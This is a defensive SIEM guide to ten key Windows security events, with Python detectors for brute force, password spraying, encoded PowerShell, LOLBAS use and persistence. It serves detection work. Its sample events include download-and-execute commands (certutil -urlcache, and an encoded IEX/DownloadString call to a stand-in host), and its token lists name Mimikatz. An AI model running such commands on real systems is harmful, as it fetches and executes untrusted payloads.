TOP 10 Events to Monitor

This table outlines the top 10 critical Windows security events to monitor for detecting threats in SIEM systems. Each entry gives the log and event ID, the event name, and a description of the event and its usefulness.

Security 4688, Sysmon 1: New Process Creation
Tracks the start of new processes. Helps detect:
  • Suspicious/unknown executables.
  • Malicious command-line arguments.
  • Abuse of LOLBAS (Living Off the Land Binaries and Scripts).

Security 4624: Successful Logon
Monitors successful authentications, including anomalies:
  • Logons from unusual hosts (e.g., unexpected geolocations).
  • Unusual logon methods (e.g., network logons for non-service accounts).

Security 4625: Failed Logon Attempt
Detects brute-force (targeting a single account) or password spraying (testing one password across multiple accounts). Correlate with Event ID 4624 to identify successful logons after multiple failures.

Security 5140, 5145: Network Resource Access
Tracks access to network resources (files, folders, named pipes). Critical for detecting lateral movement via RPC or SMB.

Security 5156, Sysmon 3: Network Connection Filtering
Shows allowed/established network connections. Check for:
  • Unusual IP addresses/ports (e.g., C2 servers).
  • Connections to non-standard services (e.g., SSH on Windows).

Security 4103/4104: PowerShell Script/Command Execution
Logs PowerShell script blocks and commands. Analyze script content for:
  • Obfuscated code (e.g., -EncodedCommand).
  • Malicious cmdlets (e.g., Invoke-Mimikatz, DownloadString).

Security 4697, System 7045: Service Installation
Monitors new service creation or configuration changes. Often abused for:
  • Persistence (e.g., malicious services).
  • Privilege escalation (e.g., services running as SYSTEM).

Security 4698: Scheduled Task Creation
Tracks new tasks in the Task Scheduler. Common in:
  • Persistence mechanisms.
  • Execution of malicious payloads at specific times.

Security 4720: User Account Creation
Alerts on new local/domain user accounts. After detection:
  • Check group membership changes.
  • Verify privilege assignments (e.g., sudden admin rights).

Sysmon 12/13: Registry Key Creation/Modification
Monitors registry changes. Critical for detecting:
  • Persistence (e.g., Run keys).
  • Configuration tampering (e.g., disabling security tools).

Sysmon 11: File Creation
Tracks file creation events. Use to detect:
  • Web-shells (e.g., .aspx in web directories).
  • Malware drops (e.g., .exe in Temp folders).
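The 4624/4625 entries above describe three detections (brute force, password spraying, and a success following repeated failures) without showing how a SIEM rule tells them apart. The following Python is an added example, not code from the page: it runs all three over a constructed batch of 4624/4625 records. The field names (TargetUserName, IpAddress) follow the Windows event schema; the Time field, the 10-minute window, and the thresholds (5 failures, 5 accounts, 3 failures before a success) are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def max_distinct_in_window(items, window):
    """items: list of (timestamp, value). Return the largest number of distinct
    values that fall inside any sliding window of length `window`."""
    items = sorted(items)
    counts = defaultdict(int)
    best = start = 0
    for end, (t, value) in enumerate(items):
        counts[value] += 1
        while t - items[start][0] > window:      # drop entries that fell out of the window
            old = items[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def detect_brute_force(events, threshold=5, window=timedelta(minutes=10)):
    """Brute force: many 4625s for ONE account from one source inside the window."""
    per_target = defaultdict(list)
    for i, e in enumerate(events):
        if e["EventID"] == 4625:
            # the event index makes every failure a distinct value, so this counts events
            per_target[(e["TargetUserName"], e["IpAddress"])].append((_ts(e), i))
    return sorted(key for key, items in per_target.items()
                  if max_distinct_in_window(items, window) >= threshold)


def detect_password_spray(events, min_accounts=5, window=timedelta(minutes=10)):
    """Password spray: one source producing 4625s for MANY accounts inside the window."""
    per_source = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            per_source[e["IpAddress"]].append((_ts(e), e["TargetUserName"]))
    return sorted(ip for ip, items in per_source.items()
                  if max_distinct_in_window(items, window) >= min_accounts)


def success_after_failures(events, min_failures=3, window=timedelta(minutes=10)):
    """Correlate 4624 with 4625: a success preceded by >= min_failures failures
    for the same account from the same source within the window."""
    hits = []
    for e in events:
        if e["EventID"] != 4624:
            continue
        t = _ts(e)
        prior = [f for f in events
                 if f["EventID"] == 4625
                 and f["TargetUserName"] == e["TargetUserName"]
                 and f["IpAddress"] == e["IpAddress"]
                 and timedelta(0) <= t - _ts(f) <= window]
        if len(prior) >= min_failures:
            hits.append((e["TargetUserName"], e["IpAddress"], len(prior)))
    return hits


# Constructed sample events (not real telemetry); field names follow the 4624/4625 schema.
def _ev(event_id, user, ip, minute, second=0):
    return {"EventID": event_id, "TargetUserName": user, "IpAddress": ip,
            "Time": f"2024-01-01T10:{minute:02d}:{second:02d}"}


EVENTS = (
    [_ev(4625, "alice", "10.0.0.5", 0, s) for s in range(0, 60, 10)]   # 6 failures in a minute
    + [_ev(4624, "alice", "10.0.0.5", 1)]                              # then a success
    + [_ev(4625, f"user{n}", "10.0.0.9", 2, n * 5) for n in range(6)]  # spray: 6 accounts, 1 try each
    + [_ev(4625, "bob", "10.0.0.20", 5), _ev(4625, "bob", "10.0.0.20", 5, 20),
       _ev(4624, "bob", "10.0.0.20", 6)]                               # benign: two typos, then logon
)

if __name__ == "__main__":
    print("brute force:", detect_brute_force(EVENTS))
    print("password spray:", detect_password_spray(EVENTS))
    print("success after failures:", success_after_failures(EVENTS))
```

The two failure detections differ only in what is grouped and what is counted: brute force groups by (account, source) and counts events, spraying groups by source and counts distinct accounts. The correlation rule is the one the 4625 entry recommends, and it stays quiet on bob's two mistyped passwords because it requires a minimum number of failures before the success.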

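The 4688 / Sysmon 1 and 4103/4104 entries both ask the analyst to look at what a process was told to run: LOLBAS binaries, encoded PowerShell, and known-bad cmdlets. The Python below is an added example, not code from the page, that applies those three checks to constructed process-creation and script-block events. It assumes the standard field names (NewProcessName and CommandLine for 4688, Image and CommandLine for Sysmon 1, ScriptBlockText for 4104; note that 4103/4104 are written to the Microsoft-Windows-PowerShell/Operational channel when script block logging is enabled). The LOLBAS set extends the page's certutil/bitsadmin examples with a few other well-known binaries, and the token list extends the page's Invoke-Mimikatz/DownloadString examples; both are assumptions to tune locally.

```python
import base64
import binascii
import ntpath
import re

# Page glossary examples (certutil.exe, bitsadmin) plus two well-known LOLBAS binaries (assumption).
LOLBAS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe"}

# Page examples (Invoke-Mimikatz, DownloadString) plus common download-and-execute idioms (assumption).
SUSPICIOUS_TOKENS = ["Invoke-Mimikatz", "DownloadString", "Invoke-Expression", "IEX", "FromBase64String"]

# powershell.exe -EncodedCommand and its short forms (-e, -ec, -enc, ...): the argument is the
# base64 of the script encoded as UTF-16LE. The pattern deliberately does not match -ExecutionPolicy.
ENC_RE = re.compile(r"(?<!\S)-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not decodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return sorted findings for a 4688 / Sysmon 1 (CommandLine) or 4104 (ScriptBlockText) event."""
    findings = set()
    image = ntpath.basename(event.get("NewProcessName") or event.get("Image") or "").lower()
    if image in LOLBAS:
        findings.add(f"lolbas:{image}")
    texts = [event.get("CommandLine") or event.get("ScriptBlockText") or ""]
    decoded = decode_encoded_command(texts[0])
    if decoded is not None:
        findings.add("encoded_command")
        texts.append(decoded)            # scan the decoded script as well as the raw command line
    for text in texts:
        for tok in SUSPICIOUS_TOKENS:
            if re.search(rf"\b{re.escape(tok)}\b", text, re.IGNORECASE):
                findings.add(f"suspicious:{tok}")
    return sorted(findings)


# Constructed sample events (not real telemetry). The encoded command is built here so the
# example demonstrates the UTF-16LE/base64 round trip rather than a hand-pasted blob.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/payload.bin payload.bin"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoProfile -enc {_B64}"},
    {"EventID": 4104, "ScriptBlockText": "Invoke-Mimikatz -DumpCreds"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["EventID"], analyze_event(e))
```

Decoding the -EncodedCommand argument before token matching is the part that matters: the raw 4688 command line for the third event contains none of the listed tokens, and only the decoded script reveals the IEX/DownloadString pattern. With script block logging enabled, 4104 also records the decoded script, which is why the page lists both event sources.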

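The service (7045), scheduled task (4698), registry (Sysmon 13) and file creation (Sysmon 11) entries above all point at persistence and malware drops, and a SIEM typically normalises them into one triage path. The Python below is an added example, not code from the page, that does so for constructed events. It assumes the standard field names (ImagePath for 7045, TaskContent holding the task XML for 4698, TargetObject for Sysmon 13, TargetFilename for Sysmon 11) and adds a Channel field to tell Sysmon IDs apart from Windows IDs; the "user-writable path" and web-root patterns, the SID and the file names are constructed and should be adapted to your hosts.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

# Locations a standard user can write to; legitimate services and tasks rarely run from here (assumption).
USER_WRITABLE = re.compile(r"\\(?:temp|appdata|users\\public|downloads)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
WEB_ROOT = re.compile(r"\\inetpub\\wwwroot\\", re.IGNORECASE)
WEB_SHELL_EXT = {".aspx", ".asp", ".php", ".jsp"}
TASK_NS_URI = "http://schemas.microsoft.com/windows/2004/02/mit/task"   # Task Scheduler XML namespace
TASK_NS = "{" + TASK_NS_URI + "}"


def check_service(e):
    """System 7045: flag a service whose binary lives in a user-writable directory."""
    return ["service_binary_in_user_writable_path"] if USER_WRITABLE.search(e["ImagePath"]) else []


def check_task(e):
    """Security 4698: parse the task XML and inspect every Exec/Command action."""
    root = ET.fromstring(e["TaskContent"])
    cmds = [c.text or "" for c in root.iter(TASK_NS + "Command")]
    return ["task_action_in_user_writable_path"] if any(USER_WRITABLE.search(c) for c in cmds) else []


def check_registry(e):
    """Sysmon 13: a value written under a Run/RunOnce key."""
    return ["run_key_persistence"] if RUN_KEY.search(e["TargetObject"]) else []


def check_file(e):
    """Sysmon 11: script files under the web root, executables in user-writable directories."""
    path = e["TargetFilename"]
    ext = ntpath.splitext(path)[1].lower()
    findings = []
    if WEB_ROOT.search(path) and ext in WEB_SHELL_EXT:
        findings.append("web_shell_candidate")
    if USER_WRITABLE.search(path) and ext in {".exe", ".dll", ".ps1"}:
        findings.append("executable_dropped_in_user_writable_path")
    return findings


CHECKS = {("System", 7045): check_service, ("Security", 4698): check_task,
          ("Sysmon", 13): check_registry, ("Sysmon", 11): check_file}


def triage(e):
    """Dispatch on (Channel, EventID); events with no registered check yield no findings."""
    return CHECKS.get((e["Channel"], e["EventID"]), lambda _: [])(e)


# Constructed sample events (not real telemetry; the SID and paths are made up).
_TASK_XML = ('<Task xmlns="' + TASK_NS_URI + '"><Actions><Exec>'
             r'<Command>C:\Users\alice\AppData\Local\Temp\run.exe</Command>'
             '</Exec></Actions></Task>')

EVENTS = [
    {"Channel": "System", "EventID": 7045, "ServiceName": "UpdaterSvc",
     "ImagePath": r"C:\Users\Public\updater.exe"},
    {"Channel": "System", "EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"Channel": "Security", "EventID": 4698, "TaskName": r"\Updater", "TaskContent": _TASK_XML},
    {"Channel": "Sysmon", "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Roaming\updater.exe"},
    {"Channel": "Sysmon", "EventID": 11, "TargetFilename": r"C:\inetpub\wwwroot\uploads\cmd.aspx"},
    {"Channel": "Sysmon", "EventID": 11, "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\x.exe"},
    {"Channel": "Security", "EventID": 4624, "TargetUserName": "alice"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["Channel"], e["EventID"], triage(e))
```

Keying the dispatch on (Channel, EventID) avoids the collision between Sysmon IDs 11/13 and the Windows event IDs with the same numbers, and parsing the 4698 TaskContent XML (rather than substring-searching it) is what lets the task check see the actual command the scheduler will run.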
Windows Security Log Reference

For detailed descriptions of all security events, see:

Key Technical Terms:

  • LOLBAS: Living Off the Land Binaries and Scripts (e.g., certutil.exe, bitsadmin).

  • RPC: Remote Procedure Call (common in lateral movement).

  • C2: Command and Control (malware communication).

  • SMB: Server Message Block (protocol for file sharing).
